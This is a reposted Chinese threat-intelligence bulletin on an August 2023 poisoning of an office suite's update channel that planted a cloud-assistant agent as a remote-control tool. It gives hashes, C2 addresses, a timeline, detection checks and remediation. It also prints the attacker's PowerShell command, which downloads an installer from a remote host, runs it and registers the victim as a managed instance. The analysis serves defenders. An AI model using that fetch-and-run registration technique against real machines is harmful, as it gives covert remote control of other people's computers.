HW战报 0818 【深度】最新办公软件投毒手段分析及应对策略

admin
admin
admin
102369
文章
87
评论
2023年8月18日22:13:05评论82 views字数 1938阅读6分27秒阅读模式

一、投毒事件

8月16日11时左右某办公软件云端官方升级文件被投毒为攻击队注册的某里云助手软件(远控程序),请检查Windows终端是否存在公有云助手软件(进程名为aliyun_assist_service ,文件名为aliyun_agent_latest_setup.exe)。并在终端安全管理后台将以下阿里云助手哈希值和恶意程序C2地址加黑:

MD5值:

19312308e9be6870940cba6ace80ef99

7e2591d7ae8d76b7bd8c3494fd2b4e0b

b579d877a4db464dd44e5ca0b1fbb066

2fbb09d89feb1a77c6cd9a9c4a8a5b97

2589acfcdb9165de1b0c44b50e8427c0

803f46e9b0f68701754488560d1f2dcd

5364cef66c2948ae66fb01c12595f74b

4105835f26727ec0bc3270280391c499

dda4c8f26fd3856aea2ffa6fe0f428ee

e5e1a47e0f080212a40fa9ce73574f21

0ad367f30415c2fb6da697e25bd702c2

e270aa663d792528a6b7f48dfdfb9df4

0d4e1e65fcde8e955b52291f4f37145e

6804651c0576aaa668cbc06a124225cd

C2地址:

39.98.177.61

182.92.210.30

k3b0615l9cmeyvsxz8ohmsm22.oss-cn-shenzhen.aliyuncs.com

二、腾讯安全攻防研究团队针对投毒事件的分析

近日,腾讯安全攻防研究团队发现一起针对官方办公软件W投毒事件,并应受害用户邀请,基于腾讯安全威胁情报能力,对样本进行了深度分析和攻击流程梳理,完整还原了威胁事件发生过程。以下为事件还原和响应建议策略:

用户A,客户终端机器上突然启动某公有云助手软件(进程名al*_assist_service),威胁分析师结合现场木马加载器w_update_loader.exe进行了分析

样本MD5:

  • 5cb7d2c90f772730bbaae5682033279c

  • 299e99002e12a97dfb325220261c200b

HW战报 0818 【深度】最新办公软件投毒手段分析及应对策略

腾讯安全攻防研究团队,基于威胁情报分析,确定了样本的潜伏期时间线:

  • 8月1日,攻击样本的最早投递时间,但当时下载服务端口处于关闭状态,沙箱无法定位后续行为记录。

  • 8月10日与8月16日陆续出现失陷机器;

  • 8月16日下载服务开启后,失陷机器获取shellcode执行后续行为被感知到。

活跃情况下图所示:

HW战报 0818 【深度】最新办公软件投毒手段分析及应对策略

(腾讯安全TIX威胁情报中心https://tix.qq.com/查询结果截图)

shellcode详情无法主动探测到且无法复现,但是从客户端行为可以推测,攻击者通过安装AL云助手将非AL云的服务器注册为AL**托管实例,实现对失陷主机的远程控制。

攻击者生成安装脚本的过程分析(Windows 为例)

Invoke-WebRequest -Uri `
'https://xxxxxx.ali***cs.com/windows/ali***_agent_latest_setup.exe' `
-OutFile 'C:\ali_agent_latest_setup.exe'
&"C:\ali_agent_latest_setup.exe"'/S' '--register' `
'--RegionId="cn-hangzhou"'

C2地址:

  • 39.98.177.61:8000

  • 47.97.165.146:8000

MD5:

  • 9cd92e378de5a9f2cdced65bd5a08a31

攻击路径推测:

基本确定是利用办公软件W云共享同步为攻击入口,攻击者拿到办公软件W的账号之后往云共享空间上传恶意文件并指定同步到终端的地址,实现样本投递。再利用主机进程的加载服务实现正常程序加载恶意dll的白+黑路径,启动原始dll木马

检查方式:

  1. 立即排查外联历史记录是否存在上述C2地址,是则主机已失陷;

  2. 添加样本查杀规则,以确定落盘文件中是否存在上述MD5文件。若是,则主机已受影响;

  3. 如本地确已安装办公软件W,请立即在涉及的终端检查版本,若为8月16日前后升级,但并未更新至最新版本,则主机已受影响,需进一步排查第1、2项。

应对建议:

请立即检查办公软件W的版本,并更新至最新官方版本(最新补丁会主动删除恶意植入的AL*云助手软件)并排查失陷主机的其他可疑行为;

原文始发于微信公众号(菜鸟学信安):HW战报 0818 【深度】最新办公软件投毒手段分析及应对策略

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月18日22:13:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HW战报 0818 【深度】最新办公软件投毒手段分析及应对策略https://cn-sec.com/archives/1964872.html

发表评论

匿名网友 填写信息